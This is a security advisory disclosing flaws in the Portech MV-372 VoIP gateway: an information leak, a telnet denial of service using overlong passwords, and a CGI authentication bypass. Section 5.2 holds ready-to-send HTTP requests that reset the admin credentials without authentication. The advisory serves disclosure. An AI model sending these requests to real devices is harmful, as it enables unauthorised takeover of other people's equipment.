Portech MV-372 Mobile VoIP Multiple Vulnerabilities

1.    Description

Multiple vulnerabilities have been found in Portech MV-372 Mobile VoIP
Gateway which allows an attacker to compromise the device and/or initiate a
denial of service attack against it’s telnet service.
The ’Device details’ section contains information about the affected system.
Previous and future versions might be also vulnerable (not tested).

The vendor has been notified and aware of the issue but from their reply it
seems we will have to wait for a hotfix/patch for a while.

2.    Device details

Mobile VoIP2 v9.092

Model Type:     MV-372
Module Description:     GSM:850/900/1800/1900MHz (SIM3x0)
Firmware Version:     Mon Sep 6 13:11:30 2010.
Codec Version:     Fri Mar 20 17:13:45 2009.
Contact Address:     150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.
Tel:     886-4-23058000
Fax:     886-4-23022596
E-Mail:     sales@portech.com.tw
Web Site:     http://www.portech.com.tw.

3.    Information disclosure

It is possible to access http://<device address>/info.htm without
authentication. This page reveals information about the device like model
type, module description, firmware and codec versions.

4.    Telnet service remote denial of service vulneraility

It is possible to initiate a denial service attack against the telnet
service without authentication by providing a very long password (e.g.: >
5000 chars) at authentication. No valid username required.
As a result of the attack the telnet service crashes and will be unavailable
until the device is restarted.

5.    Web Administration authentication bypass vulnerability

5.1    Description

An authetication bypass vulnerability exists in the web interface which
allows an attacker to modify the configuration of the device without
providing a valid username and password.
After a successful authentication we can see that our browser got no
cookie(s) from the device. After restarting the browser, deleting all stored
information or using private browsing we can still access the administrative
pages. When we change our IP address these pages are no longer accessible
and we are asked to log in. So, the device stores our IP address and uses it
as a session identifier. However this is a weakness, just like that the
application uses http protocol instead of https for authentication it also
fails to properly validate the user session.
The files with ’.htm’ extension are responsible for user interaction and
displaying configuration settings and the application is using CGI to handle
requested tasks like configuration-, username and password changes.
While the ’.htm’ pages verify our IP address, the CGI files not so calling
these files directly with the proper arguments will result in the execution
of the requested action without any authentication.

5.2    Proof of concept

To change the username and password of the device without authentication
send the following query to the device:

POST http://<device address>/change.cgi HTTP/1.1
Host:  <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit

The query above will change the actual username and password both to admin.
To apply the changes we have to save our configuration which can be done
with the query below. After executing the query the device restarts and we
can log in with the username ’admin’ and password ’admin’.

POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

All other CGIs are also vulnerable.


Regards,
Zsolt Imre